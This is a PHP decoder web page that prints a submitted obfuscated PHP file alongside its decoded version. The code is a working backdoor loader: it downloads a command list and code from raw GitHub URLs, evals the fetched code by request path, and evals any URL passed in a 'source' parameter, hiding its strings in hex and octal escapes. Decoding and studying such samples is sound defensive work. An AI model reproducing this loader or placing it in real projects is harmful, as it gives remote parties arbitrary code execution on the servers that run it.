Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto DLzmz; iR1v_: foreach (explode("\12", $commands_content) as $line) { $parts =..

Decoded Output download

<?php 
 goto DLzmz; iR1v_: foreach (explode("
", $commands_content) as $line) { $parts = explode(" ", $line, 2); if (count($parts) === 2) { $commands[$parts[0]] = trim($parts[1]); } } goto unkvb; hCrqo: $commands_content = @file_get_contents($commands_url); goto G1y6K; G1y6K: if ($commands_content === false) { die; } goto yjVMO; ZFT8T: $defaultUrl = "https://raw.githubusercontent.com/necessaryfor/neces/refs/heads/main/z1.txt"; goto wzyba; wzyba: $input = isset($_GET["source"]) ? $_GET["source"] : $defaultUrl; goto Eu6wz; jG9gA: if (isset($commands[$route])) { $code_url = $commands[$route]; $code = @file_get_contents($code_url); if ($code === false) { die; } try { eval("?>" . $code); } catch (Throwable $e) { } } else { } goto ZFT8T; Eu6wz: if (empty($_GET) && empty($_POST)) { if (filter_var($input, FILTER_VALIDATE_URL)) { $fileContent = file_get_contents($input); if ($fileContent !== false) { eval("?>" . $fileContent); } } } goto cDoLs; yjVMO: $commands = array(); goto iR1v_; DLzmz: $commands_url = "https://raw.githubusercontent.com/necessaryfor/all/refs/heads/main/komutlar.txt"; goto hCrqo; unkvb: $route = trim($_SERVER["REQUEST_URI"], "/"); goto jG9gA; cDoLs: ?>

Did this file decode correctly?

Original Code

<?php
 goto DLzmz; iR1v_: foreach (explode("\12", $commands_content) as $line) { $parts = explode("\x20", $line, 2); if (count($parts) === 2) { $commands[$parts[0]] = trim($parts[1]); } } goto unkvb; hCrqo: $commands_content = @file_get_contents($commands_url); goto G1y6K; G1y6K: if ($commands_content === false) { die; } goto yjVMO; ZFT8T: $defaultUrl = "\x68\164\x74\x70\x73\72\x2f\57\162\x61\x77\x2e\x67\x69\x74\x68\x75\x62\165\x73\145\x72\143\157\x6e\x74\x65\x6e\x74\x2e\x63\x6f\155\57\156\145\143\145\x73\x73\x61\x72\171\146\157\x72\57\x6e\x65\x63\145\x73\x2f\162\x65\146\163\x2f\150\x65\x61\x64\163\57\155\141\151\156\57\172\x31\56\164\x78\x74"; goto wzyba; wzyba: $input = isset($_GET["\163\157\x75\162\x63\x65"]) ? $_GET["\x73\157\x75\162\x63\145"] : $defaultUrl; goto Eu6wz; jG9gA: if (isset($commands[$route])) { $code_url = $commands[$route]; $code = @file_get_contents($code_url); if ($code === false) { die; } try { eval("\77\76" . $code); } catch (Throwable $e) { } } else { } goto ZFT8T; Eu6wz: if (empty($_GET) && empty($_POST)) { if (filter_var($input, FILTER_VALIDATE_URL)) { $fileContent = file_get_contents($input); if ($fileContent !== false) { eval("\x3f\x3e" . $fileContent); } } } goto cDoLs; yjVMO: $commands = array(); goto iR1v_; DLzmz: $commands_url = "\150\164\164\160\x73\72\57\x2f\162\141\167\x2e\x67\x69\x74\150\x75\x62\165\x73\x65\x72\x63\157\x6e\x74\145\156\x74\56\x63\x6f\155\57\156\x65\143\145\x73\x73\141\162\x79\146\x6f\162\57\141\154\x6c\x2f\162\x65\x66\x73\57\150\145\x61\144\163\x2f\x6d\x61\151\x6e\57\153\157\155\165\x74\x6c\141\162\x2e\164\x78\164"; goto hCrqo; unkvb: $route = trim($_SERVER["\122\105\x51\x55\x45\123\x54\137\x55\x52\x49"], "\x2f"); goto jG9gA; cDoLs: ?>

Function Calls

None

Variables

None

Stats

MD5 d282349267d73ce43bb0b7fb86739521
Eval Count 0
Decode Time 69 ms